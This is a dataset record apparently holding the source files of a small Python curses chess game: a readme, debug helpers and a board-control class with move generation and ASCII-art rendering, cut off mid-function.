deque()\nd.append('1')\nd.appendleft('10') # append on the left\nd.appendleft('1')\nr = d.count('1') # number of '1's\nprint(d)\nprint(r)\nd.extend(['22', '33', '33'])\nd.extendleft(['22', '33', '33'])\nprint(d)\nd.rotate(1) # rotate: move items from the tail to the front\nprint(d)\n\n# one-way (FIFO) queue\nimport queue\n\nq = queue.Queue()\nq.put('123') # put: first in, first out\nq.put('456')\nq.put('789')\nprint(q.qsize()) # returns the number of items in the queue\nprint(q)\nprint(q.get())\n\n# shallow vs deep copy\n\nimport copy\n\na1 = 123456\n# b1 = 123456\na2 = a1 # assignment\nprint(id(a1))\nprint(id(a2))\n\na3 = copy.deepcopy(a1)\nprint(id(a3)) # for ints, copy and deepcopy behave the same\n\n# other types: tuples, dicts, etc.\nn1 = {'k1': 'w1', 'k2': 123, 'k3': ['alex', 123456]}\nn2 = copy.copy(n1) # shallow copy: only the top level is copied, nested objects are shared\nprint(id(n1['k3']))\nprint(id(n2['k3']))\n\nprint(id(n1))\nn3 = copy.deepcopy(n1) # deep copy: everything is copied\nprint(id(n3))\n\ndic = {\n    'cpu':[80,],\n    'mem':[80,],\n    'disk':[80,]\n}\nprint(dic)\nnew_dic = copy.deepcopy(dic)\nnew_dic['cpu'][0] = 50 # after a deep copy, modifying the copy does not change the original (a shallow copy would)\nprint('before',dic)\nprint(new_dic)\n\n\nprint(new_dic.keys())\n\nfor i in new_dic.keys():\n    print(i)\n\n" },
{ "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 35.733333587646484, "blob_id": "dba0072144fe19d027a8b69a16207872ccfb963d", "content_id": "fa80b2ab455dedbbb5c8fd8838a9d610bd16acb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 586, "license_type": "no_license", "max_line_length": 85, "num_lines": 15, "path": "/src/beautiful_report/test_api.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\nfrom BeautifulReport import BeautifulReport # import BeautifulReport\nfrom testapi import test_topic_api\n\n\n\n\nif __name__ == '__main__':\n    test_suite = unittest.defaultTestLoader.discover('testcase/', pattern='test*.py')\n    test_suite.addTest(test_topic_api('test_topic'))\n    test_suite.addTest(test_topic_api('test_new_topic'))\n    #test_suite.addTest(test_topic_api('test_math'))\n    result = BeautifulReport(test_suite)\n    result.report(filename='测试报告', description='测试deafult报告', log_path='report')\n    # log_path='.' would put the report in the current directory" },
{ "alpha_fraction": 0.519175112247467, "alphanum_fraction": 0.5730825066566467, "avg_line_length": 20.62686538696289, "blob_id": "7e26129824bc6e5503ffc74cc7e3ded715d97a35", "content_id": "8a4dfb01fb7d189f944cb7e11a746d773b25e0b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3130, "license_type": "no_license", "max_line_length": 48, "num_lines": 134, "path": "/src/learn/day2-int-str-list.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "name = int(1)\nprint(type(name))\n'''common int methods'''\nage = -18\nprint(age.__abs__()) # absolute value\nprint(age.__add__(100))\nprint(age.__bool__()) # returns a bool\nprint(type(age))\nprint(type(age.__float__())) # converts to float\n\nprint(age.__floordiv__(6)) # floor division\nprint(age.__ge__(8))\n\nall_item = 95\npager = 10\nresult = all_item.__divmod__(pager)\nprint(result) # (9, 5): quotient 9, remainder 5\nresult1 = all_item.__rdivmod__(pager)\nprint(result1)\n\n'''common str methods'''\nname = 'hello'\nprint(type(name)) # get the type\nprint(dir(name)) # list the members\n\nresult = name.__contains__('llo') # contains?\nresult = name.capitalize() # capitalize the first letter\nresult = name.casefold() # lowercase\nresult = name.center(20, '*') # center in a field of width 20\nresult = name.count('l') # count occurrences\nresult = name.encode('GBK') # convert the encoding\nresult = name.endswith('e', 0, 2)\nprint(result)\n\nname1 = '\\talex'\nprint(len(name1))\nresult = name1.expandtabs() # convert tabs to spaces\nprint(result)\nprint(len(result))\n\nresult = name1.find('a') # find the position of 'a'\nresult = name1.index('a')\nprint(result)\n\nname = 'alex {0} as {1}'\nresult = name.format('sb', 'eric') # string formatting with placeholders\nli = ['1', '2', '3']\n\nprint(result)\nresult = '_'.join(li) # join the sequence with '_' (the separator may be empty)\nprint(result)\n\n# # translate: first build a mapping table; the last argument is the set of characters to delete\n# intab = \"aeiou\"\n# outtab = \"12345\"\n# trantab = maketrans(intab, outtab)\n# str = \"this is string example....wow!!!\"\n# str.translate(trantab, 'xm')\n\nname = 'alexissb'\nresult = name.partition('is') # partition on 'is'\nprint(result)\n\nprint(name.replace('s', 'o', 1))\n\nprint(name.split()) # split\nprint(name.swapcase()) # swap case\n\n'''common list methods'''\nlist1 = [i for i in range(10)]\nprint(list1)\nlist1.extend((11, 22, 22,))\nprint(list1)\n\nlist1.insert(0, 33) # insert at the given index\nprint(list1)\n\nprint(list1.pop(0)) # pop and print the value at index 0\nprint(list1)\n\nlist1.remove(22) # remove the first 22\nprint(list1)\n\nlist1.reverse() # reverse the list\nprint(list1)\n\n'''common tuple methods'''\nl1 = [11, 22, 33,]\ntu1 = tuple(l1) # convert a list to a tuple\nprint(tu1)\n\ntu = (11, 22, 33,) # convert a tuple to a list\nl2 = list(tu)\nprint(l2)\n\n'''common dict methods'''\ndic = {'k1':'k2'}\ndic = dict(k1 = 'k2',k2 = 'k3')\nprint(dic.fromkeys(['k1','k2','k3'],'v1'))\nprint(dic.get('k4','alex'))\ndic.pop('k1') # remove the given key\nprint(dic)\ndic.setdefault('k1') # set a value if the key is missing\nprint(dic)\nret = dic.update({'k3':123}) # update values\nprint(dic)\nfavorite_language = {\n    'jen': ['python', 'ruby'],\n    'mike': 'java',\n    'phil': ['c', 'java'],\n    'tom': ['python', 'haskill']\n}\nfor name, language in favorite_language.items():\n    print(name.title(),language)\n\n# goal: {'k1': [77, 88, 99], 'k2': [11, 22, 33, 44, 55, 66]}\ndef test():\n    dic ={}\n    all_list = [11,22,33,44,55,66,77,88,99,]\n    for i in all_list :\n        if i>66 :\n            if 'k1' in dic.keys():\n                dic['k1'].append(i)\n            else:\n                dic['k1'] = [i,]\n        else:\n            if 'k2' in dic.keys():\n                dic['k2'].append(i)\n            else:\n                dic['k2']=[i, ]\n    print(dic)\n\nif __name__ == '__main__':\n    test()\n" } ]
68
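The day-notes files in the qianpeng-qp/pytest1 record above trace how applying @w1 rebinds show to the wrapper returned by w1(show). A minimal standalone sketch of that rebinding, not taken from the repo (the names trace and greet are illustrative only):

def trace(func):
    # applying @trace runs trace(greet) and rebinds greet to wrapper
    def wrapper(*args, **kwargs):
        print('before %s' % func.__name__)
        result = func(*args, **kwargs)
        print('after %s' % func.__name__)
        return result
    return wrapper

@trace
def greet(name):
    print('hello %s' % name)

greet('alex')          # prints: before greet / hello alex / after greet
print(greet.__name__)  # 'wrapper' -- the original function object was rebound

Because the name is rebound, attributes such as __name__ now refer to the wrapper; the standard-library functools.wraps decorator exists to copy them back, though the notes above do not use it.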
BrynGhiffar/chess_curses
https://github.com/BrynGhiffar/chess_curses
807c131594bdb35e2b2f8ef8964df86259d48a45
a79db86ef7f95d86e164984f2e8405b37ea076f8
d8f3a7926564cb67d8bbc3592e9eaece77cb041f
refs/heads/master
2023-08-12T04:57:05.070962
2021-09-25T00:58:32
2021-09-25T00:58:32
393,341,279
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7604042887687683, "alphanum_fraction": 0.7639714479446411, "avg_line_length": 57, "blob_id": "5a43e5d60a8bf0b5c4481b281d5d18c9b462a580", "content_id": "bc0de6ddbaac5afccb9b6ff171547148ac087a86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1682, "license_type": "no_license", "max_line_length": 389, "num_lines": 29, "path": "/readme.md", "repo_name": "BrynGhiffar/chess_curses", "src_encoding": "UTF-8", "text": "# Chess in Curses\n\nThe ASCII art used to draw the board and the chess pieces is based on [this stack overflow post](https://codegolf.stackexchange.com/questions/54869/ascii-art-chessboard). Interestingly enough the post is about a competition to make the smallest chess program, albeit quit a simple one. I didn't participate in the competition, but I liked the ASCII art and decided to use it in my project.\n\n**How to play**\n\n* `H` moves the cyan cursor to the left\n* `L` moves the cyan cursor to the right\n* `J` moves the cyan cursor down\n* `K` moves the cyan cursor up\n* Pressing `Space` on a piece, highlights the piece/square to green and selects that piece. Prompts for the available moves the chosen piece can play.\n* Pressing `Space` on one of the yellow squares, moves the chosen piece (the one highlighted in green). To the chosen yellow square.\n\nFor the keen ones out there, you will notice these are the same keys used in VIM for navigating in normal mode.\n\n**Things to implement**\n\nBelow are some of the things that I wish to implement in the future:\n\n* Implement checking, you can't move any pieces that doesn't make your king safe.\n* Implement safe king moving, your king cannot move to a square that is attacked. This has to be embedded into the move of every piece.\n* Implement checkmating. The computer can recognise once there are no moves that can save the king.\n* Implement stalemating. The game can recognise once there are no moves that can be made by the current player\n* Implement pawn promotion. 
Once a pawn reaches the end it can be promoted to any piece, except for the king and another pawn.\n\n**Screenshot:**\n![](./game_play.png)\n\n![](./game_play2.png)\n" }, { "alpha_fraction": 0.5830546021461487, "alphanum_fraction": 0.6070234179496765, "avg_line_length": 22.920000076293945, "blob_id": "7c630ec3a515f5117acde4da9fd19650e02f6eb8", "content_id": "e3d72f5895cd473d2f5a4cc0653c047738114d6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1794, "license_type": "no_license", "max_line_length": 34, "num_lines": 75, "path": "/debug.py", "repo_name": "BrynGhiffar/chess_curses", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nimport curses\nfrom classes import Interface\n\ndef debug_rook(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WR\n game.brd[0][1] = game.BR\n # print(game.brd)\n game.play()\n\ndef debug_knight(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WKN\n game.brd[0][1] = game.BKN\n game.play()\n\ndef debug_bishop(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WB\n game.brd[0][1] = game.BB\n game.play()\n\ndef debug_queen(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WQ\n game.brd[0][1] = game.BQ\n game.play()\n\ndef debug_king(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WK\n game.brd[7][7] = game.BK\n game.play()\n\ndef debug_castling(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[7][0] = game.WR\n game.brd[7][4] = game.WK\n game.brd[7][7] = game.WR\n for i in range(8):\n game.brd[6][i] = game.WP\n\n game.brd[0][0] = game.BR\n game.brd[0][4] = game.BK\n game.brd[0][7] = game.BR\n for i in range(8):\n game.brd[1][i] = game.BP\n game.play()\n\nif __name__ == '__main__':\n # curses.wrapper(debug_rook)\n # curses.wrapper(debug_knight)\n # curses.wrapper(debug_bishop)\n # curses.wrapper(debug_queen)\n # curses.wrapper(debug_king)\n curses.wrapper(debug_castling)\n" }, { "alpha_fraction": 0.45506468415260315, "alphanum_fraction": 0.4692137837409973, "avg_line_length": 34.94245910644531, "blob_id": "a9c7ad2c46e08851ad3a1e7872e323fd7c84c24c", "content_id": "f33aa0ac8287e6895480bf0636735a74e36a28c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23113, "license_type": "no_license", "max_line_length": 83, "num_lines": 643, "path": "/classes.py", "repo_name": "BrynGhiffar/chess_curses", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nimport curses\n\n# TODO: implement enpassant DONE\n# TODO: implement castling move DONE\n# TODO: implement checking, you can't move any pieces that doesn't \n# make your king safe\n# TODO: implement safe king moving, your king cannot move to a square\n# that is attacked. This has to be embedded into the move of every\n# piece\n# TODO: implement check mating. The computer can recognize once\n# there are no moves that can save the king.\n# TODO: implement stalemating. 
The game can recognize once\n# there are no moves that can be made by the current player\n# TODO: implement pawn promotion\n# TODO: Make you code better!\n\nSQR = 8\n\n# From the board the pieces will deduce how\n# to make the move. For each piece is responsible\n# to coordinate themselves on how they operate\n\n# Each piece looks at the board to determine\n# What are their valid moves.\n\n# defines how the board is controlled\nclass Control:\n\n # * The Control determine the players turns\n # * The Controls controls the cursor\n # * The Control controls the the current selected piece\n # * The Control controls the board\n\n def __init__(self):\n\n # Below are the constants for the twelve pieces in the board\n self.WR, self.WKN, self.WB, self.WQ, self.WK, self.WP,\\\n self.BR, self.BKN, self.BB, self.BQ, self.BK, self.BP = list(range(12)) \n\n self.EP = -1\n self.brd = [\n [self.BR, self.BKN, self.BB, self.BQ, self.BK, self.BB, self.BKN, self.BR],\n [self.BP, self.BP, self.BP, self.BP, self.BP, self.BP, self.BP, self.BP],\n [self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP],\n [self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP],\n [self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP],\n [self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP],\n [self.WP, self.WP, self.WP, self.WP, self.WP, self.WP, self.WP, self.WP],\n [self.WR, self.WKN, self.WB, self.WQ, self.WK, self.WB, self.WKN, self.WR]]\n\n self.WHITE = 0\n self.BLACK = 1\n self.turn = self.WHITE\n self.curs_loc = [0, 0] # CPs(0, 0)\n self.pce_loc = [-1, -1]\n self.moves = []\n\n # -- for enpassant --\n self.last_pawn_skip = -1 # the column of the pawn which skipped in\n # the last move, if no pawns skip\n # then value equals to -1.\n\n self.has_king_moved = [False, False]\n # self.has_king_moved[self.WHITE] = whether the white king has moved\n # self.has_king_moved[self.BLACK] = whether the black king has moved\n\n # -- for castling --\n self.has_rook_moved = [[False, False],\n [False, False]]\n # self.has_rook_moved[self.WHITE][0] = has leftmost white rook moved\n # self.has_rook_moved[self.WHITE][1] = has rightmost white rook moved\n # self.has_rook_moved[self.BLACK][0] = has leftmost black rook moved\n # self.has_rook_moved[self.BLACK][1] = has rightmost black rook moved\n\n def get_current_player(self):\n return self.turn\n\n def n_plyr(self):\n \"\"\"returns the next player of the current turn\"\"\"\n return (self.turn + 1) % 2\n\n def toggle_player_turn(self):\n self.turn = self.n_plyr()\n\n def get_ally_func(self):\n \"\"\"returns a function which test's whether a piece is an ally\n based on turn\"\"\"\n if self.turn == self.WHITE:\n return self.is_white\n else:\n return self.is_black\n\n def get_attacking_square(self, cp):\n \"\"\"returns all the squares attacked by\n the piece at position cp\"\"\"\n piece = self.brd[cp[0]][cp[1]]\n attacks = []\n if piece != self.EP:\n t = [self.WHITE, self.BLACK][self.is_black(cp)]\n if piece in [self.WP, self.BP]:\n # diagonal capture\n dc1 = (pc_pos[0] + [-1, 1][t], pc_pos[1] + [-1, 1][t])\n if self.is_within_bounds(dc1) and is_sqr_enemy(dc1):\n attacks.append(dc1)\n\n dc2 = (pc_pos[0] + [-1, 1][t], pc_pos[1] + [1, -1][t])\n if self.is_within_bounds(dc2) and is_sqr_enemy(dc2):\n attacks.append(dc2)\n elif piece in [self.WR, self.BR]:\n pass\n elif piece in [self.WKN, self.BKN]:\n pass\n elif piece in [self.WB, self.BB]:\n pass\n elif piece in [self.WQ, self.BQ]:\n pass\n elif piece in [self.WK, self.BK]:\n 
pass\n pass\n\n def get_all_attacking_square(self, side):\n \"\"\"returns all the squares attacked by side\"\"\"\n pass\n\n def toggle_select_piece(self):\n \"\"\"toggles the selected piece to point to a certain piece\n or point to nothing at all. points to nothing when\n self.pce_loc == [-1, -1]\"\"\"\n piece = self.brd[self.curs_loc[0]][self.curs_loc[1]]\n if (piece != self.EP) and (self.get_ally_func()(piece)):\n self.pce_loc = self.curs_loc[:]\n self.moves = self.get_valid_move()\n # print(self.last_pawn_skip)\n else:\n self.pce_loc = [-1, -1]\n self.moves = []\n\n def is_enpassant(self, cp, tp):\n \"\"\"returns true if the move being played is an enpassant\"\"\"\n is_enemy_pawn = self.brd[cp[0]][tp[1]] == [self.WP, self.BP][self.n_plyr()]\n return is_enemy_pawn and self.last_pawn_skip == tp[1]\n\n def move(self, cp, tp):\n \"\"\"moves piece from location cp to location\n tp\"\"\"\n self.brd[cp[0]][cp[1]],\\\n self.brd[tp[0]][tp[1]] =\\\n self.EP, self.brd[cp[0]][cp[1]]\n\n def make_empty(self, tp):\n \"\"\"sets board at position tp to empty\"\"\"\n self.brd[tp[0]][tp[1]] = self.EP\n\n def is_pawn(self, p):\n return self.brd[p[0]][p[1]] in [self.WP, self.BP]\n \n def is_king(self, p):\n return self.brd[p[0]][p[1]] in [self.WK, self.BK]\n\n def is_rook(self, p):\n return self.brd[p[0]][p[1]] in [self.WR, self.BR]\n\n def is_right_castling(self, cp, tp):\n t = self.turn\n r = (7, 0)[t]\n c = 4\n not_moved = not self.has_king_moved[t] and\\\n not self.has_rook_moved[t][1]\n king_correct_pos = (cp[0] == r) and (cp[1] == c)\n rook_correct_pos = self.brd[r][7] == (self.WR, self.BR)[t]\n all_correct_pos = king_correct_pos and rook_correct_pos\n empty_right = [self.is_sqr_ep((r, i)) for i in range(c + 1, 7)]\n\n is_king = self.is_king(cp)\n col_move = tp[1] - cp[1] == 2\n row_move = cp[0] - tp[0] == 0\n return is_king and col_move and row_move and all(empty_right)\\\n and not_moved and all_correct_pos\n\n def is_left_castling(self, cp, tp):\n t = self.turn\n r = (7, 0)[t]\n c = 4\n not_moved = not self.has_king_moved[t] and\\\n not self.has_rook_moved[t][0]\n king_correct_pos = (cp[0] == r) and (cp[1] == c)\n rook_correct_pos = self.brd[r][0] == (self.WR, self.BR)[t]\n all_correct_pos = king_correct_pos and rook_correct_pos\n empty_left = [self.is_sqr_ep((r, i)) for i in range(1, c)]\n\n is_king = self.is_king(cp)\n col_move = cp[1] - tp[1] == 2\n row_move = cp[0] - tp[0] == 0\n return is_king and col_move and row_move and all(empty_left)\\\n and not_moved and all_correct_pos\n\n def move_piece(self):\n \"\"\"move selected piece on pce_loc to \n curs_loc if curs_loc is a valid move\"\"\"\n tp = tuple(self.curs_loc) # target move\n cp = tuple(self.pce_loc) # current piece location\n\n\n if tp in self.moves:\n piece = self.brd[cp[0]][cp[1]]\n\n # when the move being done is an enpassant\n if self.is_pawn(cp) and self.is_enpassant(cp, tp):\n self.move(cp, tp)\n ep = (tp[0] + (1, -1)[self.turn], tp[1]) # enemy position\n self.make_empty(ep)\n self.toggle_player_turn()\n return\n\n # when the move being done is a right castle\n if self.is_right_castling(cp, tp):\n self.move(cp, tp)\n self.make_empty(((7, 0)[self.turn], 7))\n self.brd[tp[0]][tp[1] - 1] = (self.WR, self.BR)[self.turn]\n self.toggle_player_turn()\n return\n\n # when the move being done is a left castle\n if self.is_left_castling(cp, tp):\n self.move(cp, tp)\n self.make_empty(((7, 0)[self.turn], 0))\n self.brd[tp[0]][tp[1] + 1] = (self.WR, self.BR)[self.turn]\n self.toggle_player_turn()\n return\n\n # when the move being done is a pawn 
skip\n do_pawn_skip = lambda cp, tp : tp[0] == cp[0] + [-2, 2][self.turn]\n if self.is_pawn(cp) and do_pawn_skip(cp, tp):\n self.last_pawn_skip = tp[1]\n else:\n self.last_pawn_skip = -1\n\n # when the king moves we want to tell the game the king has moved\n if self.is_king(cp):\n self.has_king_moved[self.turn] = True\n \n if self.is_rook(cp):\n if cp == (7, 0) and self.turn == self.WHITE:\n self.has_rook_moved[self.WHITE][0] = True\n elif cp == (7, 7) and self.turn == self.WHITE:\n self.has_rook_moved[self.WHITE][1] = True\n elif cp == (0, 0) and self.turn == self.BLACK:\n self.has_rook_moved[self.BLACK][0] = True\n elif cp == (0, 7) and self.turn == self.BLACK:\n self.has_rook_moved[self.BLACK][1] = True\n\n\n self.move(cp, tp)\n self.toggle_player_turn()\n \n def empty_board(self):\n \"\"\"clears the board of all the pieces\"\"\"\n self.brd = [[self.EP for _ in range(SQR)] for _ in range(SQR)]\n\n def move_curs_right(self):\n \"\"\"moves the cursor right\"\"\"\n if self.curs_loc[1] + 1 < SQR:\n self.curs_loc[1] += 1\n\n def move_curs_left(self):\n \"\"\"moves the cursor left\"\"\"\n if self.curs_loc[1] - 1 >= 0:\n self.curs_loc[1] -= 1\n\n def move_curs_down(self):\n \"\"\"moves the cursor down\"\"\"\n if self.curs_loc[0] + 1 < SQR:\n self.curs_loc[0] += 1\n\n def move_curs_up(self):\n \"\"\"moves the cursor up\"\"\"\n if self.curs_loc[0] - 1 >= 0:\n self.curs_loc[0] -= 1\n\n def is_white(self, piece):\n return piece <= 5 and piece >= 0\n\n def is_black(self, piece):\n return piece > 5 and piece < 12\n\n def is_pawn_first_move(self, pc_pos):\n piece = self.brd[pc_pos[0]][pc_pos[1]]\n if piece == self.WP:\n return pc_pos[0] == 6\n else:\n return pc_pos[0] == 1\n\n def is_within_bounds(self, p):\n return 0 <= p[0] < SQR and 0 <= p[1] < SQR\n\n def is_sqr_ep(self, p):\n return self.brd[p[0]][p[1]] == self.EP\n\n def get_pawn_march_moves(self, cp, t):\n \"\"\"returns the marching forward move of the pawn\n based on side and position\"\"\"\n moves = []\n fm = (cp[0] + [-1, 1][t], cp[1])\n if self.is_within_bounds(fm) and self.is_sqr_ep(fm):\n moves.append(fm)\n\n sm = ([4, 3][t], cp[1])\n if self.is_pawn_first_move(cp) and self.is_sqr_ep(sm):\n moves.append(sm)\n return moves\n \n def get_pawn_diagonal_capture_moves(self, cp, t, is_sqr_enemy):\n # diagonal capture\n moves = []\n dc1 = (cp[0] + [-1, 1][t], cp[1] + [-1, 1][t])\n if self.is_within_bounds(dc1) and is_sqr_enemy(dc1):\n moves.append(dc1)\n\n dc2 = (cp[0] + [-1, 1][t], cp[1] + [1, -1][t])\n if self.is_within_bounds(dc2) and is_sqr_enemy(dc2):\n moves.append(dc2)\n return moves\n\n def get_pawn_enpassant_capture_moves(self, cp, t):\n moves = []\n ec1 = (cp[0] + [-1, 1][t], cp[1] + [-1, 1][t])\n if self.is_within_bounds(ec1) and self.is_enpassant(cp, ec1):\n moves.append(ec1)\n\n ec2 = (cp[0] + [-1, 1][t], cp[1] + [1, -1][t])\n if self.is_within_bounds(ec2) and self.is_enpassant(cp, ec2):\n moves.append(ec2)\n return moves\n \n def get_rook_moves(self, cp, is_sqr_ally, is_sqr_enemy):\n moves = []\n for d in [(0, -1), (0, 1), (1, 0), (-1, 0)]:\n r, c = cp\n tp = (r + d[0], c + d[1]) # target position\n while self.is_within_bounds(tp) and not is_sqr_ally(tp):\n moves.append(tp)\n if is_sqr_enemy(tp):\n break\n tp = (tp[0] + d[0], tp[1] + d[1])\n return moves\n\n def get_knight_moves(self, cp, is_sqr_ally):\n moves = []\n for s in [(-1, 1), (1, -1), (1, 1), (-1, -1)]:\n for d in [(2, 1), (1, 2)]:\n tp = (cp[0] + d[0] * s[0], cp[1] + d[1] * s[1])\n if self.is_within_bounds(tp) and not is_sqr_ally(tp):\n moves.append(tp)\n return 
moves\n\n def get_bishop_moves(self, cp, is_sqr_ally, is_sqr_enemy):\n moves = []\n for d in [(1, 1), (1, -1), (-1, 1), (-1, -1)]:\n r, c = cp\n tp = (r + d[0], c + d[1]) # target position\n while self.is_within_bounds(tp) and not is_sqr_ally(tp):\n moves.append(tp)\n if is_sqr_enemy(tp):\n break\n tp = (tp[0] + d[0], tp[1] + d[1])\n return moves\n \n def get_king_moves(self, cp, is_sqr_ally):\n moves = []\n r, c = cp\n for d in [(1, 1), (1, -1), (-1, 1), (-1, -1),\n (0, -1), (0, 1), (1, 0), (-1, 0)]:\n tp = (r + d[0], c + d[1])\n if self.is_within_bounds(tp) and not is_sqr_ally(tp):\n moves.append(tp)\n return moves\n\n def get_king_castling_move(self, cp, t):\n moves = []\n r, c = (7, 0)[t], 4\n tp = (r, c - 2)\n if self.is_left_castling(cp, tp):\n moves.append((r, c - 2))\n tp = (r, c + 2)\n if self.is_right_castling(cp, tp):\n moves.append((r, c + 2))\n return moves\n\n def get_valid_move_aux(self, pc_pos, is_ally, is_enemy):\n \"\"\"generates valid moves for selected piece\"\"\"\n moves = []\n selected_piece = self.brd[pc_pos[0]][pc_pos[1]]\n t = self.turn\n\n # does this square contain an enemy piece\n is_sqr_enemy = lambda p : is_enemy(self.brd[p[0]][p[1]])\n\n # does this square contain an ally piece\n is_sqr_ally = lambda p : is_ally(self.brd[p[0]][p[1]])\n\n if selected_piece in [self.WP, self.BP]:\n\n moves.extend(self.get_pawn_march_moves(pc_pos, t))\n\n moves.extend(\n self.get_pawn_diagonal_capture_moves(pc_pos, t, is_sqr_enemy))\n\n moves.extend(self.get_pawn_enpassant_capture_moves(pc_pos, t))\n\n elif selected_piece in [self.WR, self.BR]:\n moves.extend(\n self.get_rook_moves(pc_pos, is_sqr_ally, is_sqr_enemy))\n\n elif selected_piece in [self.WKN, self.BKN]:\n moves.extend(self.get_knight_moves(pc_pos, is_sqr_ally))\n\n elif selected_piece in [self.WB, self.BB]:\n moves.extend(\n self.get_bishop_moves(pc_pos, is_sqr_ally, is_sqr_enemy))\n\n elif selected_piece in [self.WQ, self.BQ]:\n moves.extend(\n self.get_rook_moves(pc_pos, is_sqr_ally, is_sqr_enemy))\n moves.extend(\n self.get_bishop_moves(pc_pos, is_sqr_ally, is_sqr_enemy))\n\n elif selected_piece in [self.WK, self.BK]:\n moves.extend(self.get_king_moves(pc_pos, is_sqr_ally))\n moves.extend(self.get_king_castling_move(pc_pos, t))\n return moves\n\n def get_valid_move(self):\n # returns array of legal positions\n pc_pos = self.pce_loc\n selected_piece = self.brd[pc_pos[0]][pc_pos[1]]\n moves = []\n if self.is_white(selected_piece):\n\n # find legal next moves for that particular black piece\n moves.extend(\n self.get_valid_move_aux(pc_pos, self.is_white, self.is_black))\n elif self.is_black(selected_piece):\n\n # find legal next moves for that particular white piece\n moves.extend(\n self.get_valid_move_aux(pc_pos, self.is_black, self.is_white))\n return moves\n\nclass Display(Control):\n\n def __init__(self, stdscr):\n super().__init__()\n\n self.stdscr = stdscr\n self.BOARD_POS = (0, 0) # dimension of board is 40 rows x 72 columns\n self.CHR_PR_COL = 9\n self.CHR_PR_ROW = 5\n # determines the color of the board\n self.CLR_BRD = [[(i + j) % 2 for j in range(SQR)]\\\n for i in range(SQR)]\n\n self.ABK = [ ' _+_ ', # Each piece has dimensions w x h : 5 x 5\n ' )@( ',\n ' |@| ',\n ' |@| ',\n ' /@@@\\\\ ']\n self.ABQ = [ ' www ',\n ' )@( ',\n ' |@| ',\n ' |@| ',\n ' /@@@\\\\ ' ]\n self.ABB= [ ' ',\n ' (/) ',\n ' |@| ',\n ' |@| ',\n ' /@@@\\\\ ']\n self.ABKN = [ ' ',\n ' _,, ',\n ' \"- \\~ ',\n ' |@| ',\n ' /@@@\\\\ ']\n self.ABR = [ ' ',\n ' |_|_| ',\n ' |@| ',\n ' |@| ',\n ' /@@@\\\\ ']\n self.ABP = [ ' ',\n ' ',\n ' 
() ',\n ' )( ',\n ' /@@\\\\ ']\n\n self.AWK = [ ' _+_ ', # Each piece has dimensions w x h : 5 x 5\n ' ) ( ',\n ' | | ',\n ' | | ',\n ' /___\\\\ ']\n self.AWQ = [ ' www ',\n ' ) ( ',\n ' | | ',\n ' | | ',\n ' /___\\\\ ' ]\n self.AWB = [ ' ',\n ' (/) ',\n ' | | ',\n ' | | ',\n ' /___\\\\ ']\n self.AWKN = [ ' ',\n ' _,, ',\n ' \"- \\~ ',\n ' | | ',\n ' /___\\\\ ']\n self.AWR = [ ' ',\n ' |_|_| ',\n ' | | ',\n ' | | ',\n ' /___\\\\ ']\n self.AWP = [ ' ',\n ' ',\n ' () ',\n ' )( ',\n ' /__\\\\ ']\n self.PIECES = [self.AWR, self.AWKN, self.AWB, self.AWQ, self.AWK, self.AWP,\n self.ABR, self.ABKN, self.ABB, self.ABQ, self.ABK, self.ABP]\n self.MASK_PIECES = [self.mask(piece) for piece in self.PIECES]\n self.ALL_PIECES = [self.PIECES, self.MASK_PIECES]\n\n # colors\n\n def mask(self, ascii_piece):\n # create a copy of the piece\n piece = [[ascii_piece[i][j] for j in range(self.CHR_PR_COL)]\\\n for i in range(self.CHR_PR_ROW)]\n\n # modify the copy to fill the background\n for line in piece:\n # 0 to right\n i = 0\n while (i < self.CHR_PR_COL) and (line[i] == ' '):\n line[i] = ':'\n i += 1\n # self.\n i = self.CHR_PR_COL - 1\n while (i >= 0) and (line[i] == ' '):\n line[i] = ':'\n i -= 1\n\n # return the masked copy\n return [''.join(line) for line in piece]\n\n def draw_board(self):\n col = self.CHR_PR_COL\n row = self.CHR_PR_ROW\n square = SQR\n empty = self.EP\n pb = self.brd\n cb = self.CLR_BRD\n ap = self.ALL_PIECES\n # texture = [' ', '█']\n texture = [' ', ':']\n curses.init_pair(1, -1, curses.COLOR_CYAN) # selected_cursor\n curses.init_pair(2, -1, curses.COLOR_GREEN) # selected_piece\n curses.init_pair(3, -1, curses.COLOR_YELLOW) # moves\n\n for _ in range(col * square + 2):\n self.stdscr.addstr(':')\n self.stdscr.addstr('\\n')\n\n for i in range(row * square):\n self.stdscr.addstr(':')\n for j in range(col * square):\n is_slt_piece = [ i // row, j // col ] == self.pce_loc\n is_slt_curs = [i // row, j // col] == self.curs_loc\n is_move_sqr = (i // row, j // col) in self.moves\n\n if is_slt_piece:\n self.stdscr.attron(curses.color_pair(2))\n if is_move_sqr:\n self.stdscr.attron(curses.color_pair(3))\n if is_slt_curs:\n 